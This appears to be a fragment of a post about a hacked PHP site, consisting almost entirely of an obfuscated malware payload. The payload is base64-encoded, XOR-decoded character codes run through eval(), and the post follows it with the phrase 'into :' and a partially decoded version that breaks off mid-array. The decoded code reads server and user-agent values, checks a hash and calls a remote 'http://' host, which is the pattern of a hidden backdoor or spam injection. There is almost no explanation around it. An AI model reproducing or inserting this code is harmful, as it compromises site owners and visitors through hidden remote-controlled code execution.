U2Ozc5Ozc2OzU3OzcyOzc1Ozg1OzcxOzE7OTI7OTI7OTI7OTI7OTI7OTI7OTI7ODg7NDY7NjE7NTg7NzQ7Nzk7NTc7NjE7NjE7NzU7NjE7Nzg7NTY7Nzc7NzM7NjM7NjE7NzM7Njk7NjE7NjI7NjI7Njk7NzM7NjI7NzQ7NTg7NTY7Nzc7NjE7NTg7NTc7NjI7NTg7NjU7OTQ7MjA7ODs4OzEyOzcwOzgzOzgzOzk0OzgyOzMwOzI5OzE1OzI1Ozc0OzcyOzM1OzI0OzI1OzMxOzE5OzI0OzI1Ozg0Ozk0OzM3Ozc4OzY5OzE1OzM3OzE4OzE2OzIwOzI0OzU5OzY5Ozk7MjQ7NTk7NTg7NTsyOTs0Mzs2ODs5OzM3Ozc4OzY5Ozg7OTQ7ODU7ODI7OTQ7ODM7MTY7MjE7MTg7MjM7MTU7ODM7OTQ7ODI7MTQ7Mjk7MTg7MjQ7ODQ7NzY7ODA7Nzg7NzM7NzY7ODU7ODI7OTQ7ODI7ODs0Ozg7Njc7MjE7MTI7NjU7OTQ7ODI7ODg7MzU7NDc7NTc7NDY7NDI7NTc7NDY7Mzk7OTQ7NDY7NTc7NDk7NTE7NDA7NTc7MzU7NjE7NTY7NTY7NDY7OTQ7MzM7ODI7OTQ7OTA7MjA7MTk7MTU7ODs2NTs5NDs4MjsxNDsyOTsxMTs5OzE0OzE2OzI1OzE4OzMxOzE5OzI0OzI1Ozg0Ozg4OzM1OzQ3OzU3OzQ2OzQyOzU3OzQ2OzM5Ozk0OzUyOzQwOzQwOzQ0OzM1OzUyOzUxOzQ3OzQwOzk0OzMzOzg1OzgyOzk0OzkwOzI5OzI3OzI1OzE4Ozg7NjU7OTQ7ODI7MTQ7Mjk7MTE7OTsxNDsxNjsyNTsxODszMTsxOTsyNDsyNTs4NDs4ODszNTs0Nzs1Nzs0Njs0Mjs1Nzs0NjszOTs5NDs1Mjs0MDs0MDs0NDszNTs0MTs0Nzs1Nzs0NjszNTs2MTs1OTs1Nzs1MDs0MDs5NDszMzs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs1ODs3Mjs2ODs2Mjs1ODs1ODs2OTs3Njs3Mzs3Mzs1ODs3Mjs3NDs2Mjs2OTs3Mjs2ODs3OTs2Mjs2Mzs2OTs3Njs1Njs2Mzs3Njs2MTs3Nzs3NDs3Njs1Nzs3NDs3NTs2NTs5NDs5NDs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs5Mjs4NDsyNjs5OzE4OzMxOzg7MjE7MTk7MTg7MzU7MjU7NDsyMTsxNTs4OzE1Ozg0Ozk0OzMxOzk7MTQ7MTY7MzU7MjE7MTg7MjE7ODs5NDs4NTs4NTs5Mjs3OzkyOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc1OzU2OzU4OzcyOzY4Ozc3OzU2Ozc2Ozc0Ozc0Ozc3Ozc5OzY4OzYzOzU4Ozc1OzYyOzczOzU2Ozc1OzU2OzYxOzc3OzY5OzYyOzYzOzYyOzc4OzYxOzY4Ozc1OzcyOzkyOzY1OzkyOzYwOzMxOzk7MTQ7MTY7MzU7MjE7MTg7MjE7ODs4NDs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2OzM1OzE1OzI1Ozg7MTk7MTI7ODs5Mjs4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2ODs3NTs3Mjs4MDs5Mjs2Mzs0MTs0Njs0ODs1MTs0NDs0MDszNTs0MTs0Njs0ODs4MDs5Mjs4ODs0Njs2MTs1ODs3NDs3OTs1Nzs2MTs2MTs3NTs2MTs3ODs1Njs3Nzs3Mzs2Mzs2MTs3Mzs2OTs2MTs2Mjs2Mjs2OTs3Mzs2Mjs3NDs1ODs1Njs3Nzs2MTs1ODs1Nzs2Mjs1ODs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2OzM1OzE1OzI1Ozg7MTk7MTI7ODs5Mjs4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2ODs3NTs3Mjs4MDs5Mjs2Mzs0MTs0Njs0ODs1MTs0NDs0MDszNTs0Njs1Nzs0MDs0MTs0Njs1MDs0MDs0Njs2MTs1MDs0Nzs1ODs1Nzs0Njs4MDs5Mjs3Nzs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2OzM1OzE1OzI1Ozg7MTk7MTI7ODs5Mjs4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2ODs3NTs3Mjs4MDs5Mjs2Mzs0MTs0Njs0ODs1MTs0NDs0MDszNTs0MDs1Mzs0OTs1Nzs1MTs0MTs0MDs4MDs5Mjs3Nzs3Mzs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2OzM1OzE1OzI1Ozg7MTk7MTI7ODs5Mjs4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2ODs3NTs3Mjs4MDs5Mjs2Mzs0MTs0Njs0ODs1MTs0NDs0MDszNTs1Nzs1MDs2Mzs1MTs1Njs1Mzs1MDs1OTs5Mjs4MDs5Mjs5NDsyNzs2OzIxOzEyOzk0Ozg1OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2OzU4OzcyOzY4OzYyOzU4OzU4OzY5Ozc2OzczOzczOzU4OzcyOzc0OzYyOzY5OzcyOzY4Ozc5OzYyOzYzOzY5Ozc2OzU2OzYzOzc2OzYxOzc3Ozc0Ozc2OzU3Ozc0Ozc1OzY1OzYwOzMxOzk7MTQ7MTY7MzU7MjU7NDsyNTszMTs5Mjs4NDs4ODs0Njs3NTs1Njs1ODs3Mjs2ODs3Nzs1Njs3Njs3NDs3NDs3Nzs3OTs2ODs2Mzs1ODs3NTs2Mjs3Mzs1Njs3NTs1Njs2MTs3Nzs2OTs2Mjs2Mzs2Mjs3ODs2MTs2ODs3NTs3Mjs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs2MDszMTs5OzE0OzE2OzM1OzMxOzE2OzE5OzE1OzI1OzkyOzg0Ozg4OzQ2Ozc1OzU2OzU4OzcyOzY4Ozc3OzU2Ozc2Ozc0Ozc0Ozc3Ozc5OzY4OzYzOzU4Ozc1OzYyOzczOzU2Ozc1OzU2OzYxOzc3OzY5OzYyOzYzOzYyOzc4OzYxOzY4Ozc1OzcyOzg1OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzE7OTI7MjU7MTY7MTU7MjU7OTI7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs1ODs3Mjs2ODs2Mjs1ODs1ODs2OTs3Njs3Mzs3Mzs1ODs3Mjs3NDs2Mjs2OTs3Mjs2ODs3OTs2Mjs2Mzs2OTs3Njs1Njs2Mzs3Njs2MTs3Nzs3NDs3Njs1Nzs3NDs3NTs2NTs2MDsyNjsyMTsxNjsyNTszNTsyNzsyNTs4OzM1OzMxOzE5OzE4Ozg7MjU7MTg7ODsxNTs4NDs4ODs0Njs2MTs1ODs3NDs3OTs1Nzs2MTs2MTs3NTs2MTs3ODs1Njs3Nzs3Mzs2Mzs2MTs3Mzs2OTs2MTs2Mjs2Mjs2OTs3Mzs2Mjs3NDs1ODs1Njs3Nzs2MTs1ODs1Nzs2Mjs1ODs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsxOzkyOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7OTI7OTI7MTQ7MjU7ODs5OzE0OzE4OzkyOzg4OzQ2OzU4OzcyOzY4OzYyOzU4OzU4OzY5Ozc2OzczOzczOzU4OzcyOzc0OzYyOzY5OzcyOzY4Ozc5OzYyOzYzOzY5Ozc2OzU2OzYzOzc2OzYxOzc3Ozc0Ozc2OzU3Ozc0Ozc1OzcxOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs4NDs5MzsyNjs5OzE4OzMxOzg7MjE7MTk7MTg7MzU7MjU7NDsyMTsxNTs4OzE1Ozg0OzkxOzI3OzY7MjQ7MjU7MzE7MTk7MjQ7MjU7OTE7ODU7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5MjsyNjs5OzE4OzMxOzg7MjE7MTk7MTg7OTI7Mjc7NjsyNDsyNTszMTsxOTsyNDsyNTs4NDs4ODs0Njs3Mzs2MTs2OTs2Mzs1ODs3Nzs2Mjs3Mjs2OTs3NTs3Mzs3Njs3ODs2MTs2Mzs2MTs3ODs3OTs2Mzs2ODs1ODs3NDs3Nzs3Nzs2MTs3Mzs3NDs3Mjs3NDs2ODs3Mjs2Mzs4NTs3OzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc5Ozc2OzYyOzc4OzYxOzYyOzY4OzU2OzYzOzc3OzcyOzY5Ozc0OzU2Ozc2Ozc0OzYyOzc4Ozc5Ozc2OzYxOzc1Ozc3OzU2OzY4OzY5Ozc0Ozc4OzYxOzU4OzczOzU2OzY1OzYwOzE5OzE0OzI0Ozg0OzYwOzE1Ozk7MzA7MTU7ODsxNDs4NDs4ODs0Njs3Mzs2MTs2OTs2Mzs1ODs3Nzs2Mjs3Mjs2OTs3NTs3Mzs3Njs3ODs2MTs2Mzs2MTs3ODs3OTs2Mzs2ODs1ODs3NDs3Nzs3Nzs2MTs3Mzs3NDs3Mjs3NDs2ODs3Mjs2Mzs4MDs3OTs4MDs3Nzs4NTs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs2Mjs1Nzs3Mjs2Mzs3Mjs1Njs3Njs3OTs3NTs1Nzs2OTs3OTs2OTs3ODs3ODs3NDs1ODs3NDs3Mzs2ODs3Nzs3ODs2ODs2ODs3Mzs2MTs3Mzs3OTs1Njs2MTs1Njs2OTs2NTs3Nzs3Njs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs2MTs3OTs1Njs3Mzs3ODs1Nzs3Mzs3ODs2MTs3Mjs2ODs2OTs3OTs3NDs2Mzs1Njs1Nzs3Njs1ODs3Mzs3OTs3Mzs3NDs2Mjs2Mjs3Njs2ODs3NDs3Mzs3ODs1ODs3ODs2NTs3Njs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs4NDs4ODs0Njs3OTs3Njs2Mjs3ODs2MTs2Mjs2ODs1Njs2Mzs3Nzs3Mjs2OTs3NDs1Njs3Njs3NDs2Mjs3ODs3OTs3Njs2MTs3NTs3Nzs1Njs2ODs2OTs3NDs3ODs2MTs1ODs3Mzs1Njs5MDs3Mjs4NTs3OzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc0Ozc5OzYyOzU3OzU2OzU3Ozc0OzYyOzc3OzY5Ozc4Ozc0Ozc0OzU2OzcyOzU3OzU4OzU3OzYxOzU2Ozc2Ozc1OzYxOzcyOzU2OzY5Ozc3OzU3Ozc4OzY5OzU3OzYyOzY1OzYwOzk7MTg7MTI7Mjk7MzE7MjM7ODQ7OTE7MTA7OTE7ODA7MTU7OTszMDsxNTs4OzE0Ozg0Ozg4OzQ2OzczOzYxOzY5OzYzOzU4Ozc3OzYyOzcyOzY5Ozc1OzczOzc2Ozc4OzYxOzYzOzYxOzc4Ozc5OzYzOzY4OzU4Ozc0Ozc3Ozc3OzYxOzczOzc0OzcyOzc0OzY4OzcyOzYzOzgwOzc3Ozc2OzgwOzc4Ozg1Ozg1OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc0Ozc5OzYyOzU3OzU2OzU3Ozc0OzYyOzc3OzY5Ozc4Ozc0Ozc0OzU2OzcyOzU3OzU4OzU3OzYxOzU2Ozc2Ozc1OzYxOzcyOzU2OzY5Ozc3OzU3Ozc4OzY5OzU3OzYyOzY1Ozg4OzQ2Ozc0Ozc5OzYyOzU3OzU2OzU3Ozc0OzYyOzc3OzY5Ozc4Ozc0Ozc0OzU2OzcyOzU3OzU4OzU3OzYxOzU2Ozc2Ozc1OzYxOzcyOzU2OzY5Ozc3OzU3Ozc4OzY5OzU3OzYyOzM5Ozc3OzMzOzcxOzkyOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2OzYyOzU3OzcyOzYzOzcyOzU2Ozc2Ozc5Ozc1OzU3OzY5Ozc5OzY5Ozc4Ozc4Ozc0OzU4Ozc0OzczOzY4Ozc3Ozc4OzY4OzY4OzczOzYxOzczOzc5OzU2OzYxOzU2OzY5Ozg3OzY1Ozc4Ozg3Ozg4OzQ2Ozc0Ozc5OzYyOzU3OzU2OzU3Ozc0OzYyOzc3OzY5Ozc4Ozc0Ozc0OzU2OzcyOzU3OzU4OzU3OzYxOzU2Ozc2Ozc1OzYxOzcyOzU2OzY5Ozc3OzU3Ozc4OzY5OzU3OzYyOzcxOzkyOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7ODg7NDY7Nzk7NzY7NjI7Nzg7NjE7NjI7Njg7NTY7NjM7Nzc7NzI7Njk7NzQ7NTY7NzY7NzQ7NjI7Nzg7Nzk7NzY7NjE7NzU7Nzc7NTY7Njg7Njk7NzQ7Nzg7NjE7NTg7NzM7NTY7OTA7Njg7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs2Mjs1Nzs3Mjs2Mzs3Mjs1Njs3Njs3OTs3NTs1Nzs2OTs3OTs2OTs3ODs3ODs3NDs1ODs3NDs3Mzs2ODs3Nzs3ODs2ODs2ODs3Mzs2MTs3Mzs3OTs1Njs2MTs1Njs2OTs2NTs2MDsxNTs4OzE0OzEyOzE5OzE1Ozg0Ozg4OzQ2OzczOzYxOzY5OzYzOzU4Ozc3OzYyOzcyOzY5Ozc1OzczOzc2Ozc4OzYxOzYzOzYxOzc4Ozc5OzYzOzY4OzU4Ozc0Ozc3Ozc3OzYxOzczOzc0OzcyOzc0OzY4OzcyOzYzOzgwOzMxOzIwOzE0Ozg0Ozc2Ozg1OzgwOzg4OzQ2OzYyOzU3OzcyOzYzOzcyOzU2Ozc2Ozc5Ozc1OzU3OzY5Ozc5OzY5Ozc4Ozc4Ozc0OzU4Ozc0OzczOzY4Ozc3Ozc4OzY4OzY4OzczOzYxOzczOzc5OzU2OzYxOzU2OzY5Ozg1Ozg3Ozc3OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7ODg7NDY7Nzk7NzY7NjI7Nzg7NjE7NjI7Njg7NTY7NjM7Nzc7NzI7Njk7NzQ7NTY7NzY7NzQ7NjI7Nzg7Nzk7NzY7NjE7NzU7Nzc7NTY7Njg7Njk7NzQ7Nzg7NjE7NTg7NzM7NTY7OTA7Nzc7NzQ7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs2Mjs1Nzs3Mjs2Mzs3Mjs1Njs3Njs3OTs3NTs1Nzs2OTs3OTs2OTs3ODs3ODs3NDs1ODs3NDs3Mzs2ODs3Nzs3ODs2ODs2ODs3Mzs2MTs3Mzs3OTs1Njs2MTs1Njs2OTs2NTs2MDsxNTs4OzE0OzEyOzE5OzE1Ozg0Ozg4OzQ2OzczOzYxOzY5OzYzOzU4Ozc3OzYyOzcyOzY5Ozc1OzczOzc2Ozc4OzYxOzYzOzYxOzc4Ozc5OzYzOzY4OzU4Ozc0Ozc3Ozc3OzYxOzczOzc0OzcyOzc0OzY4OzcyOzYzOzgwOzMxOzIwOzE0Ozg0Ozc2Ozg1OzgwOzg4OzQ2OzYyOzU3OzcyOzYzOzcyOzU2Ozc2Ozc5Ozc1OzU3OzY5Ozc5OzY5Ozc4Ozc4Ozc0OzU4Ozc0OzczOzY4Ozc3Ozc4OzY4OzY4OzczOzYxOzczOzc5OzU2OzYxOzU2OzY5Ozg1Ozg3Ozc3OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7ODg7NDY7Nzk7NzY7NjI7Nzg7NjE7NjI7Njg7NTY7NjM7Nzc7NzI7Njk7NzQ7NTY7NzY7NzQ7NjI7Nzg7Nzk7NzY7NjE7NzU7Nzc7NTY7Njg7Njk7NzQ7Nzg7NjE7NTg7NzM7NTY7OTA7Nzg7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs2Mjs1Nzs3Mjs2Mzs3Mjs1Njs3Njs3OTs3NTs1Nzs2OTs3OTs2OTs3ODs3ODs3NDs1ODs3NDs3Mzs2ODs3Nzs3ODs2ODs2ODs3Mzs2MTs3Mzs3OTs1Njs2MTs1Njs2OTs4Nzs2NTs3ODs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsxOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc2Ozc5OzcyOzYxOzU3Ozc4OzYxOzYyOzY5OzcyOzU4OzY5OzY5OzYzOzYzOzY4Ozc3OzYyOzc5OzY4OzY5OzYxOzc3OzY4Ozc4Ozc4OzU2OzYxOzc5Ozc5OzczOzc5OzY1OzYwOzI3OzY7MjE7MTg7MjY7MTY7Mjk7ODsyNTs4NDs2MDsxNTs5OzMwOzE1Ozg7MTQ7ODQ7ODg7NDY7NzM7NjE7Njk7NjM7NTg7Nzc7NjI7NzI7Njk7NzU7NzM7NzY7Nzg7NjE7NjM7NjE7Nzg7Nzk7NjM7Njg7NTg7NzQ7Nzc7Nzc7NjE7NzM7NzQ7NzI7NzQ7Njg7NzI7NjM7ODA7ODg7NDY7NjI7NTc7NzI7NjM7NzI7NTY7NzY7Nzk7NzU7NTc7Njk7Nzk7Njk7Nzg7Nzg7NzQ7NTg7NzQ7NzM7Njg7Nzc7Nzg7Njg7Njg7NzM7NjE7NzM7Nzk7NTY7NjE7NTY7Njk7ODU7ODU7NzE7OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7ODg7NDY7NzY7Nzk7NzI7NjE7NTc7Nzg7NjE7NjI7Njk7NzI7NTg7Njk7Njk7NjM7NjM7Njg7Nzc7NjI7Nzk7Njg7Njk7NjE7Nzc7Njg7Nzg7Nzg7NTY7NjE7Nzk7Nzk7NzM7Nzk7NjU7NjU7NjU7NTg7NjE7NDg7NDc7NTc7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs3Njs3OTs3Mjs2MTs1Nzs3ODs2MTs2Mjs2OTs3Mjs1ODs2OTs2OTs2Mzs2Mzs2ODs3Nzs2Mjs3OTs2ODs2OTs2MTs3Nzs2ODs3ODs3ODs1Njs2MTs3OTs3OTs3Mzs3OTs2NTs4ODs0Njs3Mzs2MTs2OTs2Mzs1ODs3Nzs2Mjs3Mjs2OTs3NTs3Mzs3Njs3ODs2MTs2Mzs2MTs3ODs3OTs2Mzs2ODs1ODs3NDs3Nzs3Nzs2MTs3Mzs3NDs3Mjs3NDs2ODs3Mjs2Mzs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsxOzkyOzkyOzkyOzkyOzkyOzkyOzE0OzI1Ozg7OTsxNDsxODs5Mjs4ODs0Njs3Njs3OTs3Mjs2MTs1Nzs3ODs2MTs2Mjs2OTs3Mjs1ODs2OTs2OTs2Mzs2Mzs2ODs3Nzs2Mjs3OTs2ODs2OTs2MTs3Nzs2ODs3ODs3ODs1Njs2MTs3OTs3OTs3Mzs3OTs3MTs5Mjs5Mjs5Mjs5Mjs5MjsxOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7MjY7OTsxODszMTs4OzIxOzE5OzE4OzkyOzE3OzE0OzE5OzMwOzIwOzg0Ozg4OzQ2OzU3OzY4Ozc4OzU3OzU3OzY5OzYyOzc3Ozc4Ozc3OzU4Ozc1Ozc2OzY5OzY4OzY5OzczOzU3OzU4OzczOzcyOzU3OzYyOzYxOzc1OzU4OzYxOzc0OzYyOzc1OzY4OzYyOzg1Ozc7OTI7OTI7OTI7OTI7OTI7NTI7MjU7Mjk7MjQ7MjU7MTQ7ODQ7OTE7NjM7MTk7MTg7ODsyNTsxODs4OzgxOzU3OzE4OzMxOzE5OzI0OzIxOzE4OzI3OzcwOzkyOzE4OzE5OzE4OzI1OzkxOzg1OzcxOzkyOzkyOzkyOzkyOzkyOzg4OzQ2OzYxOzc3Ozc1OzY5OzYxOzYyOzU2Ozc5OzYxOzc1OzYyOzY5OzU3Ozc4OzY4OzYzOzc5Ozc0OzY5OzU4Ozc1OzYyOzczOzY5OzYzOzczOzc3OzYyOzY4Ozc3OzU2OzU3OzY1OzI3OzY7MjQ7MjU7MzE7MTk7MjQ7MjU7ODQ7ODg7NDY7NTc7Njg7Nzg7NTc7NTc7Njk7NjI7Nzc7Nzg7Nzc7NTg7NzU7NzY7Njk7Njg7Njk7NzM7NTc7NTg7NzM7NzI7NTc7NjI7NjE7NzU7NTg7NjE7NzQ7NjI7NzU7Njg7NjI7ODU7NzE7OTI7OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7MTI7MTQ7MjU7Mjc7MzU7MTc7Mjk7ODszMTsyMDs4NDs5MTs4MzszMjs2NDszMjs4MzszMDsxOTsyNDs1OzgzOzE1OzIxOzkxOzgwOzg4OzQ2OzYxOzc3Ozc1OzY5OzYxOzYyOzU2Ozc5OzYxOzc1OzYyOzY5OzU3Ozc4OzY4OzYzOzc5Ozc0OzY5OzU4Ozc1OzYyOzczOzY5OzYzOzczOzc3OzYyOzY4Ozc3OzU2OzU3Ozg1Ozg1Ozc7OTI7OTI7OTI7OTI7OTI7OTI7MTQ7MjU7ODs5OzE0OzE4OzkyOzEyOzE0OzI1OzI3OzM1OzE0OzI1OzEyOzE2OzI5OzMxOzI1Ozg0OzkxOzgzOzg0OzMyOzY0OzMyOzgzOzMwOzE5OzI0OzU7Mzk7MzQ7MzI7NjY7MzM7ODY7MzI7NjY7ODU7ODM7MTU7MjE7OTE7ODA7Mjc7MTc7MTY7ODQ7ODU7ODI7OTQ7MzI7MTg7OTQ7ODI7OTE7ODg7Nzc7OTE7ODA7ODg7NDY7NjE7Nzc7NzU7Njk7NjE7NjI7NTY7Nzk7NjE7NzU7NjI7Njk7NTc7Nzg7Njg7NjM7Nzk7NzQ7Njk7NTg7NzU7NjI7NzM7Njk7NjM7NzM7Nzc7NjI7Njg7Nzc7NTY7NTc7ODU7NzE7OTI7OTI7OTI7OTI7OTI7MTsyNTsxNjsxNTsyNTs3OzkyOzkyOzkyOzkyOzkyOzkyOzE0OzI1Ozg7OTsxNDsxODs5Mjs4ODs0Njs2MTs3Nzs3NTs2OTs2MTs2Mjs1Njs3OTs2MTs3NTs2Mjs2OTs1Nzs3ODs2ODs2Mzs3OTs3NDs2OTs1ODs3NTs2Mjs3Mzs2OTs2Mzs3Mzs3Nzs2Mjs2ODs3Nzs1Njs1Nzs4MjsyNzsxNzsxNjs4NDs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5MjsxOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7MTk7MzA7MzU7MTU7ODsyOTsxNDs4Ozg0OzkxOzE3OzE0OzE5OzMwOzIwOzkxOzg1OzcxOzkyOzkyOzkyOzE7OTI7OTI7MTsiKTskej0iIjtmb3JlYWNoKCRtIGFzICR2KWlmICgkdiE9IiIpJHouPWNocigkdl4kayk7ZXZhbCgkeik7"));?>

 

 

into :

 

$k=124;$m=explode(";","21;26;84;26;9;18;31;8;21;19;18;35;25;4;21;15;8;15;84;91;19;30;35;15;8;29;14;8;91;85;90;90;93;21;15;15;25;8;84;88;59;48;51;62;61;48;47;39;91;17;14;35;18;19;91;33;85;85;7;92;92;92;88;59;48;51;62;61;48;47;39;91;17;14;35;18;19;91;33;65;77;71;92;92;92;21;26;84;93;26;9;18;31;8;21;19;18;35;25;4;21;15;8;15;84;91;17;14;19;30;20;91;85;85;7;92;92;92;92;92;92;21;26;84;93;26;9;18;31;8;21;19;18;35;25;4;21;15;8;15;84;91;27;17;16;91;85;85;7;92;92;92;92;92;26;9;18;31;8;21;19;18;92;27;17;16;84;85;7;92;92;92;92;92;92;21;26;92;84;15;8;14;21;15;8;14;84;88;35;47;57;46;42;57;46;39;94;52;40;40;44;35;41;47;57;46;35;61;59;57;50;40;94;33;80;94;27;19;19;27;16;25;30;19;8;94;85;0;0;15;8;14;21;15;8;14;84;88;35;47;57;46;42;57;46;39;94;52;40;40;44;35;41;47;57;46;35;61;59;57;50;40;94;33;80;94;5;29;20;19;19;94;85;85;7;92;92;92;92;92;92;92;21;26;92;84;84;17;24;73;84;88;35;46;57;45;41;57;47;40;39;94;17;17;17;29;23;19;11;19;21;11;19;11;76;76;78;94;33;85;65;65;94;29;79;69;79;72;24;30;25;78;76;30;76;30;79;25;69;30;30;25;75;29;69;25;26;31;31;74;73;78;74;26;72;94;85;90;90;84;21;15;15;25;8;84;88;35;46;57;45;41;57;47;40;39;94;17;17;17;29;23;19;11;19;21;11;19;11;76;76;77;94;33;85;85;85;7;88;46;68;75;78;73;76;78;69;57;61;68;69;75;77;78;57;57;56;68;74;75;76;62;61;57;74;72;56;79;76;57;72;75;65;30;29;15;25;74;72;35;24;25;31;19;24;25;84;88;35;46;57;45;41;57;47;40;39;94;17;17;17;29;23;19;11;19;21;11;19;11;76;76;77;94;33;85;71;14;25;8;9;14;18;92;94;57;4;25;31;9;8;21;19;18;82;82;82;88;46;68;75;78;73;76;78;69;57;61;68;69;75;77;78;57;57;56;68;74;75;76;62;61;57;74;72;56;79;76;57;72;75;32;18;94;82;25;10;29;16;84;88;46;68;75;78;73;76;78;69;57;61;68;69;75;77;78;57;57;56;68;74;75;76;62;61;57;74;72;56;79;76;57;72;75;85;71;1;92;92;92;92;92;92;92;88;46;61;58;74;79;57;61;61;75;61;78;56;77;73;63;61;73;69;61;62;62;69;73;62;74;58;56;77;61;58;57;62;58;65;94;20;8;8;12;70;83;83;94;82;30;29;15;25;74;72;35;24;25;31;19;24;25;84;94;37;78;69;15;37;18;16;20;24;59;69;9;24;59;58;5;29;43;68;9;37;78;69;8;94;85;82;94;83;16;21;18;23;15;83;94;82;14;29;18;24;84;76;80;78;73;76;85;82;94;82;8;4;8;67;21;12;65;94;82;88;35;47;57;46;42;57;46;39;94;46;57;49;51;40;57;35;61;56;56;46;94;33;82;94;90;20;19;15;8;65;94;82;14;29;11;9;14;16;25;18;31;19;24;25;84;88;35;47;57;46;42;57;46;39;94;52;40;40;44;35;52;51;47;40;94;33;85;82;94;90;29;27;25;18;8;65;94;82;14;29;11;9;14;16;25;18;31;19;24;25;84;88;35;47;57;46;42;57;46;39;94;52;40;40;44;35;41;47;57;46;35;61;59;57;50;40;94;33;85;71;92;92;92;92;92;92;92;88;46;58;72;68;62;58;58;69;76;73;73;58;72;74;62;69;72;68;79;62;63;69;76;56;63;76;61;77;74;76;57;74;75;65;94;94;71;92;92;92;92;92;92;92;21;26;92;84;26;9;18;31;8;21;19;18;35;25;4;21;15;8;15;84;94;31;9;14;16;35;21;18;21;8;94;85;85;92;7;92;92;92;92;92;92;92;92;88;46;75;56;58;72;68;77;56;76;74;74;77;79;68;63;58;75;62;73;56;75;56;61;77;69;62;63;62;78;61;68;75;72;92;65;92;60;31;9;14;16;35;21;18;21;8;84;85;71;92;92;92;92;92;92;92;92;60;31;9;14;16;35;15;25;8;19;12;8;92;84;88;46;75;56;58;72;68;77;56;76;74;74;77;79;68;63;58;75;62;73;56;75;56;61;77;69;62;63;62;78;61;68;75;72;80;92;63;41;46;48;51;44;40;35;41;46;48;80;92;88;46;61;58;74;79;57;61;61;75;61;78;56;77;73;63;61;73;69;61;62;62;69;73;62;74;58;56;77;61;58;57;62;58;85;71;92;92;92;92;92;92;92;92;60;31;9;14;16;35;15;25;8;19;12;8;92;84;88;46;75;56;58;72;68;77;56;76;74;74;77;79;68;63;58;75;62;73;56;75;56;61;77;69;62;63;62;78;61;68;75;72;80;92;63;41;46;48;51;44;40;35;46;57;40;41;46;50;40;46;61;50;47;58;57;46;80;92;77;85;71;92;92;92;92;92;92;92;92;60;31;9;14;16;35;15;25;8;19;12;8;92;84;88;46;75;56;58;72;68;77;56;76;74;74;77;79;68;63;58;75;62;73;56;75;56;61;77;69;62;63;62;78;61;68;75;72;80;92;63;41;46;48;51;44;40;35;40;53;49;57;51;41;40;80;92;77;73;85;71;92;92;92;92;92;92;92;92;60;31;9;14;